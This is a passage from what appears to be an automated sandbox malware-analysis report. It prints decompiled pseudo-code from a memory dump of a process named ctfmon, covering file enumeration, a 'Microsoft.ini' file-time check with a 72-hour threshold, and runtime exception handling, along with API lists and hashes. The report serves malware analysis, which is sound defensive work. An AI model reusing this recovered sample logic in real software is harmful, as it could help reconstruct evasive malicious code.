                                                								__eflags = _t45 - 0x2f;
                                                								if(_t45 != 0x2f) {
                                                									__eflags = _t45 - 0x5c;
                                                									if(_t45 != 0x5c) {
                                                										__eflags = _t45 - 0x3a;
                                                										if(_t45 != 0x3a) {
                                                											_t88 = E00980770(_t79, _t88);
                                                											continue;
                                                										}
                                                									}
                                                								}
                                                								break;
                                                							}
                                                							_t102 =  *_t88;
                                                							__eflags = _t102 - 0x3a;
                                                							if(_t102 != 0x3a) {
                                                								L19:
                                                								_t106 = 0;
                                                								__eflags = _t102 - 0x2f;
                                                								if(_t102 == 0x2f) {
                                                									L23:
                                                									_t47 = 1;
                                                									__eflags = 1;
                                                								} else {
                                                									__eflags = _t102 - 0x5c;
                                                									if(_t102 == 0x5c) {
                                                										goto L23;
                                                									} else {
                                                										__eflags = _t102 - 0x3a;
                                                										if(_t102 == 0x3a) {
                                                											goto L23;
                                                										} else {
                                                											_t47 = 0;
                                                										}
                                                									}
                                                								}
                                                								_t90 = _t88 - _t79 + 1;
                                                								asm("sbb eax, eax");
                                                								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                                                								E00973440(_t106,  &_v332, _t106, 0x140);
                                                								_t122 = _t121 + 0xc;
                                                								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
                                                								_t55 = _v336;
                                                								__eflags = _t113 - 0xffffffff;
                                                								if(_t113 != 0xffffffff) {
                                                									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                                                									__eflags = _t92;
                                                									_t93 = _t92 >> 2;
                                                									_v344 = _t92 >> 2;
                                                									do {
                                                										__eflags = _v332.cFileName - 0x2e;
                                                										if(_v332.cFileName != 0x2e) {
                                                											L36:
                                                											_push(_t55);
                                                											_t57 = E0097B9D3(_t79, _t93, _t106,  &(_v332.cFileName), _t79, _v340);
                                                											_t122 = _t122 + 0x10;
                                                											__eflags = _t57;
                                                											if(_t57 != 0) {
                                                												goto L26;
                                                											} else {
                                                												goto L37;
                                                											}
                                                										} else {
                                                											_t93 = _v287;
                                                											__eflags = _t93;
                                                											if(_t93 == 0) {
                                                												goto L37;
                                                											} else {
                                                												__eflags = _t93 - 0x2e;
                                                												if(_t93 != 0x2e) {
                                                													goto L36;
                                                												} else {
                                                													__eflags = _v286;
                                                													if(_v286 == 0) {
                                                														goto L37;
                                                													} else {
                                                														goto L36;
                                                													}
                                                												}
                                                											}
                                                										}
                                                										goto L40;
                                                										L37:
                                                										_t62 = FindNextFileA(_t113,  &_v332);
                                                										__eflags = _t62;
                                                										_t55 = _v336;
                                                									} while (_t62 != 0);
                                                									_t103 =  *_t55;
                                                									_t96 = _v344;
                                                									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                                                									__eflags = _t96 - _t65;
                                                									if(_t96 != _t65) {
                                                										E009802D0(_t79, _t106, _t103 + _t96 * 4, _t65 - _t96, 4, E0097B82B);
                                                									}
                                                								} else {
                                                									_push(_t55);
                                                									_t57 = E0097B9D3(_t79, _t90, _t106, _t79, _t106, _t106);
                                                									L26:
                                                									_t106 = _t57;
                                                								}
                                                								__eflags = _t113 - 0xffffffff;
                                                								if(_t113 != 0xffffffff) {
                                                									FindClose(_t113);
                                                								}
                                                							} else {
                                                								__eflags = _t88 -  &(_t79[1]);
                                                								if(_t88 ==  &(_t79[1])) {
                                                									goto L19;
                                                								} else {
                                                									_push(_t112);
                                                									E0097B9D3(_t79, _t88, 0, _t79, 0, 0);
                                                								}
                                                							}
                                                							_pop(_t114);
                                                							__eflags = _v12 ^ _t118;
                                                							return E00970A5D(_v12 ^ _t118, _t114);
                                                						} else {
                                                							goto L6;
                                                						}
                                                					}
                                                				} else {
                                                					_t74 = 0xc;
                                                					L8:
                                                					return _t74;
                                                				}
                                                				L40:
                                                			}



















































                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .$/LU5/
                                                • API String ID: 0-1863816827
                                                • Opcode ID: ca3511ff78ab8bf408942ff30d3859ec4698ae80c4c6618e2c9d6190a1071bf9
                                                • Instruction ID: 00c54e86717d3491ff97d44c63cf79f253ce58363aff2c20ed066cdd64bd2209
                                                • Opcode Fuzzy Hash: ca3511ff78ab8bf408942ff30d3859ec4698ae80c4c6618e2c9d6190a1071bf9
                                                • Instruction Fuzzy Hash: C03104729002496FCB289E78CC85FFA7BBDEF85314F1481A8F95CD7251E6309E448B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0096A3B0(void* __ebx, void* __ecx, signed int __edx, void* __edi) {
                                                				signed int _v8;
                                                				short _v532;
                                                				short _v1052;
                                                				struct _FILETIME _v1060;
                                                				struct _FILETIME _v1068;
                                                				struct _FILETIME _v1076;
                                                				struct _FILETIME _v1084;
                                                				struct _FILETIME _v1092;
                                                				struct _FILETIME _v1100;
                                                				void* __esi;
                                                				signed int _t38;
                                                				void* _t50;
                                                				int _t61;
                                                				void* _t69;
                                                				void* _t72;
                                                				signed int _t83;
                                                				signed int _t94;
                                                				void* _t96;
                                                				void* _t97;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t100;
                                                				signed int _t103;
                                                
                                                				_t95 = __edi;
                                                				_t94 = __edx;
                                                				_t38 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t38 ^ _t103;
                                                				_t99 = __ecx;
                                                				E00973440(__edi,  &_v532, 0, 0x208);
                                                				_t100 = wsprintfW;
                                                				wsprintfW( &_v532, L"%ws\\%ws", _t99, L"Microsoft.ini");
                                                				E00973440(_t95,  &_v1052, 0, 0x208);
                                                				wsprintfW( &_v1052, L"%ws.log",  &_v532);
                                                				_t50 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0, 0);
                                                				if(_t50 == 0xffffffff) {
                                                					L14:
                                                					__eflags = _v8 ^ _t103;
                                                					return E00970A5D(_v8 ^ _t103, _t100);
                                                				} else {
                                                					_t101 = CloseHandle;
                                                					CloseHandle(_t50);
                                                					_v1092.dwLowDateTime = 0;
                                                					_v1092.dwHighDateTime = 0;
                                                					_v1100.dwLowDateTime = 0;
                                                					_v1100.dwHighDateTime = 0;
                                                					_v1060.dwLowDateTime = 0;
                                                					_v1060.dwHighDateTime = 0;
                                                					_v1068.dwLowDateTime = 0;
                                                					_v1068.dwHighDateTime = 0;
                                                					_v1076.dwLowDateTime = 0;
                                                					_v1076.dwHighDateTime = 0;
                                                					_v1084.dwLowDateTime = 0;
                                                					_v1084.dwHighDateTime = 0;
                                                					_t96 = CreateFileW( &_v1052, 0x80000000, 1, 0, 2, 0x80, 0);
                                                					if(_t96 == 0xffffffff) {
                                                						L13:
                                                						__eflags = _v8 ^ _t103;
                                                						return E00970A5D(_v8 ^ _t103, _t101);
                                                					} else {
                                                						_t61 = GetFileTime(_t96,  &_v1092,  &_v1060,  &_v1076);
                                                						_push(_t96);
                                                						if(_t61 != 0) {
                                                							CloseHandle();
                                                							DeleteFileW( &_v1052);
                                                							_t97 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0x80, 0);
                                                							__eflags = _t97 - 0xffffffff;
                                                							if(_t97 != 0xffffffff) {
                                                								GetFileTime(_t97,  &_v1100,  &_v1068,  &_v1084);
                                                								CloseHandle(_t97);
                                                							}
                                                							asm("sbb eax, [ebp-0x424]");
                                                							_t98 = E00984470(_v1060.dwLowDateTime - _v1068.dwLowDateTime, _v1060.dwHighDateTime, 0x2710, 0);
                                                							_t101 = _v1076.dwLowDateTime - _v1084.dwLowDateTime;
                                                							_t83 = _t94;
                                                							asm("sbb ecx, [ebp-0x434]");
                                                							_t69 = E00984470(_v1076.dwLowDateTime - _v1084.dwLowDateTime, _v1076.dwHighDateTime, 0x2710, 0);
                                                							__eflags = _t83 - _t94;
                                                							if(__eflags < 0) {
                                                								L9:
                                                								_t69 = _t98;
                                                								_t94 = _t83;
                                                							} else {
                                                								if(__eflags <= 0) {
                                                									__eflags = _t98 - _t69;
                                                									if(_t98 <= _t69) {
                                                										goto L9;
                                                									}
                                                								}
                                                							}
                                                							_t72 = E00984470(E00984470(E00984470(_t69, _t94, 0x3e8, 0), _t94, 0x3c, 0), _t94, 0x3c, 0);
                                                							__eflags = _t94;
                                                							if(__eflags < 0) {
                                                								goto L13;
                                                							} else {
                                                								if(__eflags > 0) {
                                                									goto L14;
                                                								} else {
                                                									__eflags = _t72 - 0x48;
                                                									if(_t72 > 0x48) {
                                                										goto L14;
                                                									} else {
                                                										goto L13;
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							CloseHandle();
                                                							return E00970A5D(_v8 ^ _t103, CloseHandle);
                                                						}
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • wsprintfW.USER32 ref: 0096A3F6
                                                • wsprintfW.USER32 ref: 0096A421
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0096A442
                                                • CloseHandle.KERNEL32(00000000), ref: 0096A454
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 0096A4E7
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0096A50A
                                                • CloseHandle.KERNEL32(00000000), ref: 0096A515
                                                • CloseHandle.KERNEL32(00000000), ref: 0096A52A
                                                • DeleteFileW.KERNEL32(?), ref: 0096A533
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0096A552
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0096A571
                                                • CloseHandle.KERNEL32(00000000), ref: 0096A578
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A59B
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A5C5
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A5E1
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A5EC
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0096A5F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$Unothrow_t@std@@@__ehfuncinfo$??2@$CloseHandle$Create$Timewsprintf$Delete
                                                • String ID: %ws.log$%ws\%ws$/LU5/$Microsoft.ini
                                                • API String ID: 3158408392-2106214503
                                                • Opcode ID: 2e38780b6d21cc262ff9f1a8eda2bab4b73b267121bbb9f7328b5ac13e68f5a7
                                                • Instruction ID: dd254ca6c80efafbc03176912b8192157b6da0d9ed9be558c977998c16ee02d0
                                                • Opcode Fuzzy Hash: 2e38780b6d21cc262ff9f1a8eda2bab4b73b267121bbb9f7328b5ac13e68f5a7
                                                • Instruction Fuzzy Hash: 9A5187B1A4021CAADB20DB64CC85FDE77BCAB44714F5401D9F709B71C1DAB06E898F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E0097221C(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
                                                				intOrPtr _v0;
                                                				intOrPtr _v4;
                                                				char _v5;
                                                				char _v12;
                                                				char _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				char _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				char _v72;
                                                				intOrPtr* _v80;
                                                				signed int _v100;
                                                				signed int* _v144;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				char _t190;
                                                				signed int* _t198;
                                                				intOrPtr* _t199;
                                                				signed int _t202;
                                                				signed int _t206;
                                                				intOrPtr* _t210;
                                                				signed int _t211;
                                                				signed int _t212;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t221;
                                                				void* _t225;
                                                				signed int _t227;
                                                				void* _t231;
                                                				void* _t233;
                                                				char _t234;
                                                				signed int* _t236;
                                                				signed int _t237;
                                                				signed int _t238;
                                                				signed int _t240;
                                                				signed int _t244;
                                                				void* _t246;
                                                				void* _t248;
                                                				void* _t251;
                                                				intOrPtr _t253;
                                                				intOrPtr _t254;
                                                				void* _t256;
                                                				char _t257;
                                                				signed int _t263;
                                                				char* _t267;
                                                				intOrPtr _t273;
                                                				signed int _t278;
                                                				signed int _t279;
                                                				signed int _t282;
                                                				char _t283;
                                                				intOrPtr _t285;
                                                				signed int _t287;
                                                				signed int* _t289;
                                                				intOrPtr* _t290;
                                                				signed int* _t292;
                                                				signed int _t294;
                                                				intOrPtr _t300;
                                                				intOrPtr* _t304;
                                                				signed int _t305;
                                                				void* _t306;
                                                				signed int* _t310;
                                                				void* _t313;
                                                				void* _t314;
                                                				void* _t316;
                                                				void* _t317;
                                                				void* _t318;
                                                				void* _t319;
                                                
                                                				_t282 = __edx;
                                                				_t264 = __ecx;
                                                				_t253 = _a8;
                                                				_push(_t304);
                                                				_t289 = _a20;
                                                				_v44 = 0;
                                                				_v5 = 0;
                                                				if(_t289[1] > 0x80) {
                                                					_t190 =  *((intOrPtr*)(_t253 + 8));
                                                				} else {
                                                					_t190 =  *((char*)(_t253 + 8));
                                                				}
                                                				_v12 = _t190;
                                                				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
                                                					L62:
                                                					E0097753C(_t253, _t264, _t289, _t304, __eflags);
                                                					goto L63;
                                                				} else {
                                                					_t304 = _a4;
                                                					if( *_t304 != 0xe06d7363) {
                                                						_t264 = _a12;
                                                						goto L57;
                                                					} else {
                                                						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                							L23:
                                                							_t264 = _a12;
                                                							_v16 = _t264;
                                                							goto L25;
                                                						} else {
                                                							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
                                                							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
                                                								goto L23;
                                                							} else {
                                                								_t225 = E0097360E(_t253, _t264, _t282, _t289, _t304, _t328);
                                                								_t329 =  *((intOrPtr*)(_t225 + 0x10));
                                                								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
                                                									L61:
                                                									return _t225;
                                                								} else {
                                                									_t304 =  *((intOrPtr*)(E0097360E(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
                                                									_t246 = E0097360E(_t253, _t264, _t282, _t289, _t304, _t329);
                                                									_v44 = 1;
                                                									_v16 =  *((intOrPtr*)(_t246 + 0x14));
                                                									if(_t304 == 0) {
                                                										goto L62;
                                                									} else {
                                                										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                											L19:
                                                											_t248 = E0097360E(_t253, _t264, _t282, _t289, _t304, _t336);
                                                											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
                                                											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
                                                												L24:
                                                												_t264 = _v16;
                                                												_t190 = _v12;
                                                												L25:
                                                												__eflags =  *_t304 - 0xe06d7363;
                                                												if( *_t304 != 0xe06d7363) {
                                                													L57:
                                                													__eflags = _t289[3];
                                                													if(__eflags <= 0) {
                                                														goto L60;
                                                													} else {
                                                														__eflags = _a24;
                                                														if(__eflags != 0) {
                                                															goto L62;
                                                														} else {
                                                															_push(_a32);
                                                															_push(_a28);
                                                															_push(_t190);
                                                															_push(_t289);
                                                															_push(_a16);
                                                															_push(_t264);
                                                															_push(_t253);
                                                															_push(_t304);
                                                															L66();
                                                															_t316 = _t316 + 0x20;
                                                															goto L60;
                                                														}
                                                													}
                                                												} else {
                                                													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
                                                													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
                                                														goto L57;
                                                													} else {
                                                														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
                                                														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
                                                															L30:
                                                															__eflags = _t289[3];
                                                															if(_t289[3] > 0) {
                                                																_t264 =  &_v28;
                                                																_t233 = E00973879( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
                                                																_t282 = _v28;
                                                																_t316 = _t316 + 0x14;
                                                																__eflags = _t282 - _v48;
                                                																if(_t282 < _v48) {
                                                																	_t47 = _t233 + 0x10; // 0x10
                                                																	_t278 = _t47;
                                                																	_t234 = _v12;
                                                																	_v36 = _t278;
                                                																	do {
                                                																		_t50 = _t278 - 0x10; // 0x0
                                                																		_v60 = _t50;
                                                																		_t289 = _a20;
                                                																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
                                                																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
                                                																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
                                                																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
                                                																				_v24 =  *_t278;
                                                																				_t263 =  *(_t278 - 4);
                                                																				__eflags = _t263;
                                                																				_v32 = _t263;
                                                																				_t253 = _a8;
                                                																				if(_t263 > 0) {
                                                																					_t279 = _v24;
                                                																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
                                                																					_t287 =  *_t236;
                                                																					_t237 =  &(_t236[1]);
                                                																					__eflags = _t237;
                                                																					_v52 = _t237;
                                                																					_t238 = _v32;
                                                																					_v56 = _t287;
                                                																					while(1) {
                                                																						_v20 = _v52;
                                                																						_t289 = _a20;
                                                																						_v40 = _t287;
                                                																						__eflags = _t287;
                                                																						if(_t287 <= 0) {
                                                																							goto L41;
                                                																						} else {
                                                																							goto L38;
                                                																						}
                                                																						while(1) {
                                                																							L38:
                                                																							_t240 = E00972B69(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
                                                																							_t316 = _t316 + 0xc;
                                                																							__eflags = _t240;
                                                																							if(_t240 != 0) {
                                                																								break;
                                                																							}
                                                																							_v20 = _v20 + 4;
                                                																							_t244 = _v40 - 1;
                                                																							_t279 = _v24;
                                                																							_v40 = _t244;
                                                																							__eflags = _t244;
                                                																							if(_t244 > 0) {
                                                																								continue;
                                                																							} else {
                                                																								_t238 = _v32;
                                                																								goto L41;
                                                																							}
                                                																							L44:
                                                																							_t282 = _v28;
                                                																							_t278 = _v36;
                                                																							_t234 = _v12;
                                                																							goto L45;
                                                																						}
                                                																						_push(_v44);
                                                																						_v5 = 1;
                                                																						E00972157(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
                                                																						_t316 = _t316 + 0x2c;
                                                																						goto L44;
                                                																						L41:
                                                																						_t238 = _t238 - 1;
                                                																						_t279 = _t279 + 0x10;
                                                																						_v32 = _t238;
                                                																						_v24 = _t279;
                                                																						__eflags = _t238;
                                                																						if(_t238 > 0) {
                                                																							_t287 = _v56;
                                                																							_v20 = _v52;
                                                																							_t289 = _a20;
                                                																							_v40 = _t287;
                                                																							__eflags = _t287;
                                                																							if(_t287 <= 0) {
                                                																								goto L41;
                                                																							} else {
                                                																								goto L38;
                                                																							}
                                                																						}
                                                																						goto L44;
                                                																					}
                                                																				}
                                                																			}
                                                																		}
                                                																		L45:
                                                																		_t282 = _t282 + 1;
                                                																		_t278 = _t278 + 0x14;
                                                																		_v28 = _t282;
                                                																		_v36 = _t278;
                                                																		__eflags = _t282 - _v48;
                                                																	} while (_t282 < _v48);
                                                																}
                                                															}
                                                															__eflags = _a24;
                                                															if(__eflags != 0) {
                                                																_push(1);
                                                																E00971E94(__eflags);
                                                																_t264 = _t304;
                                                															}
                                                															__eflags = _v5;
                                                															if(__eflags != 0) {
                                                																L60:
                                                																_t225 = E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																__eflags =  *(_t225 + 0x1c);
                                                																if(__eflags != 0) {
                                                																	goto L62;
                                                																} else {
                                                																	goto L61;
                                                																}
                                                															} else {
                                                																_t227 =  *_t289 & 0x1fffffff;
                                                																__eflags = _t227 - 0x19930521;
                                                																if(__eflags < 0) {
                                                																	goto L60;
                                                																} else {
                                                																	__eflags = _t289[7];
                                                																	if(_t289[7] != 0) {
                                                																		L52:
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if(__eflags != 0) {
                                                																			goto L62;
                                                																		} else {
                                                																			_push(_t289[7]);
                                                																			L86();
                                                																			_t264 = _t304;
                                                																			__eflags = _t227;
                                                																			if(__eflags != 0) {
                                                																				goto L60;
                                                																			} else {
                                                																				E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				 *((intOrPtr*)(E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
                                                																				_t231 = E0097360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				__eflags = _a32;
                                                																				_t267 = _v16;
                                                																				_push(_t304);
                                                																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
                                                																				if(_a32 != 0) {
                                                																					goto L64;
                                                																				} else {
                                                																					_push(_t253);
                                                																				}
                                                																				goto L65;
                                                																			}
                                                																		}
                                                																	} else {
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if(__eflags == 0) {
                                                																			goto L60;
                                                																		} else {
                                                																			goto L52;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														} else {
                                                															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
                                                															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
                                                																goto L30;
                                                															} else {
                                                																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
                                                																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                																	goto L57;
                                                																} else {
                                                																	goto L30;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_v36 =  *((intOrPtr*)(E0097360E(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
                                                												_t251 = E0097360E(_t253, _t264, _t282, _t289, _t304, _t337);
                                                												_push(_v36);
                                                												_push(_t304);
                                                												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
                                                												L86();
                                                												if(_t251 != 0) {
                                                													goto L24;
                                                												} else {
                                                													_push(_v36);
                                                													L99();
                                                													_pop(_t264);
                                                													_t339 = _t251;
                                                													if(_t251 == 0) {
                                                														goto L62;
                                                													} else {
                                                													}
                                                													L63:
                                                													_push(1);
                                                													_push(_t304);
                                                													E00971E94(_t339);
                                                													_t267 =  &_v72;
                                                													E00971F49(_t267);
                                                													E009733CD( &_v72, 0x98de1c);
                                                													L64:
                                                													_push(_a32);
                                                													L65:
                                                													E00973923(_t267);
                                                													_push(_a16);
                                                													_push(_t253);
                                                													E009729A5(_t253, _t267, _t282, _t289, _t339);
                                                													_t317 = _t316 + 0x10;
                                                													_push(_t289[7]);
                                                													_t198 = E0097211D(_t253, _t267, _t282, _t289, _t304, _t339);
                                                													asm("int3");
                                                													_t313 = _t317;
                                                													_push(_t267);
                                                													_push(_t267);
                                                													_push(_t289);
                                                													_t290 = _v80;
                                                													_t340 =  *_t290 - 0x80000003;
                                                													if( *_t290 == 0x80000003) {
                                                														L84:
                                                														return _t198;
                                                													} else {
                                                														_push(_t253);
                                                														_t199 = E0097360E(_t253, _t267, _t282, _t290, _t304, _t340, _t304);
                                                														_t254 = _a16;
                                                														_t341 =  *((intOrPtr*)(_t199 + 8));
                                                														if( *((intOrPtr*)(_t199 + 8)) == 0) {
                                                															L72:
                                                															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
                                                																E0097753C(_t254, _t267, _t290, _t304, __eflags);
                                                																asm("int3");
                                                																_push(_t313);
                                                																_t314 = _t317;
                                                																_t318 = _t317 - 0x18;
                                                																_push(_t254);
                                                																_push(_t304);
                                                																_t305 = _v100;
                                                																_push(_t290);
                                                																__eflags = _t305;
                                                																if(__eflags == 0) {
                                                																	E0097753C(_t254, _t267, _t290, _t305, __eflags);
                                                																	asm("int3");
                                                																	_push(_t314);
                                                																	_push(_t254);
                                                																	_push(_t305);
                                                																	_push(_t290);
                                                																	_t292 = _v144;
                                                																	_t306 = 0;
                                                																	__eflags =  *_t292;
                                                																	if( *_t292 <= 0) {
                                                																		L103:
                                                																		_t202 = 0;
                                                																		__eflags = 0;
                                                																	} else {
                                                																		_t256 = 0;
                                                																		while(1) {
                                                																			_t206 = E0097359A( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x995d4c);
                                                																			__eflags = _t206;
                                                																			if(_t206 == 0) {
                                                																				break;
                                                																			}
                                                																			_t306 = _t306 + 1;
                                                																			_t256 = _t256 + 0x10;
                                                																			__eflags = _t306 -  *_t292;
                                                																			if(_t306 <  *_t292) {
                                                																				continue;
                                                																			} else {
                                                																				goto L103;
                                                																			}
                                                																			goto L104;
                                                																		}
                                                																		_t202 = 1;
                                                																	}
                                                																	L104:
                                                																	return _t202;
                                                																} else {
                                                																	_t294 =  *_t305;
                                                																	_t257 = 0;
                                                																	__eflags = _t294;
                                                																	if(_t294 > 0) {
                                                																		_t283 = 0;
                                                																		_v16 = 0;
                                                																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
                                                																		_t211 = _t210 + 4;
                                                																		__eflags = _t211;
                                                																		_v28 =  *_t210;
                                                																		_v36 = _t211;
                                                																		do {
                                                																			_t271 = _t211;
                                                																			_t212 = _v28;
                                                																			_v24 = _t211;
                                                																			_v20 = _t212;
                                                																			__eflags = _t212;
                                                																			if(_t212 > 0) {
                                                																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
                                                																				__eflags = _t214;
                                                																				_v32 = _t214;
                                                																				while(1) {
                                                																					_t215 = E00972B69(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
                                                																					_t318 = _t318 + 0xc;
                                                																					__eflags = _t215;
                                                																					if(_t215 != 0) {
                                                																						break;
                                                																					}
                                                																					_t217 = _v20 - 1;
                                                																					_t271 = _v24 + 4;
                                                																					_v20 = _t217;
                                                																					__eflags = _t217;
                                                																					_v24 = _v24 + 4;
                                                																					_t214 = _v32;
                                                																					if(_t217 > 0) {
                                                																						continue;
                                                																					} else {
                                                																					}
                                                																					L95:
                                                																					_t283 = _v16;
                                                																					goto L96;
                                                																				}
                                                																				_t257 = 1;
                                                																				goto L95;
                                                																			}
                                                																			L96:
                                                																			_t211 = _v36;
                                                																			_t283 = _t283 + 0x10;
                                                																			_v16 = _t283;
                                                																			_t294 = _t294 - 1;
                                                																			__eflags = _t294;
                                                																		} while (_t294 != 0);
                                                																	}
                                                																	return _t257;
                                                																}
                                                															} else {
                                                																_t198 = E00973879(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
                                                																_t273 = _v16;
                                                																_t319 = _t317 + 0x14;
                                                																_t285 = _v12;
                                                																if(_t273 < _t285) {
                                                																	_t137 =  &(_t198[3]); // 0xc
                                                																	_t310 = _t137;
                                                																	_t198 = _a20;
                                                																	do {
                                                																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
                                                																			_t221 =  *_t310 << 4;
                                                																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
                                                																				L79:
                                                																				_t222 = _t221 + _t310[1] + 0xfffffff0;
                                                																				_t300 = _v0;
                                                																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
                                                																					_push(1);
                                                																					_t155 = _t310 - 0xc; // 0x0
                                                																					E00972157(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
                                                																					_t285 = _v12;
                                                																					_t319 = _t319 + 0x2c;
                                                																					_t273 = _v16;
                                                																				}
                                                																			} else {
                                                																				_t285 = _v12;
                                                																				_t254 = _a16;
                                                																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
                                                																					goto L79;
                                                																				}
                                                																			}
                                                																			_t198 = _a20;
                                                																		}
                                                																		_t273 = _t273 + 1;
                                                																		_t310 =  &(_t310[5]);
                                                																		_v16 = _t273;
                                                																	} while (_t273 < _t285);
                                                																}
                                                																goto L83;
                                                															}
                                                														} else {
                                                															__imp__EncodePointer();
                                                															_t304 = _t199;
                                                															if( *((intOrPtr*)(E0097360E(_t254, _t267, _t282, _t290, _t304, _t341, 0) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
                                                																goto L72;
                                                															} else {
                                                																_t198 = E0097379C(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
                                                																_t317 = _t317 + 0x1c;
                                                																if(_t198 != 0) {
                                                																	L83:
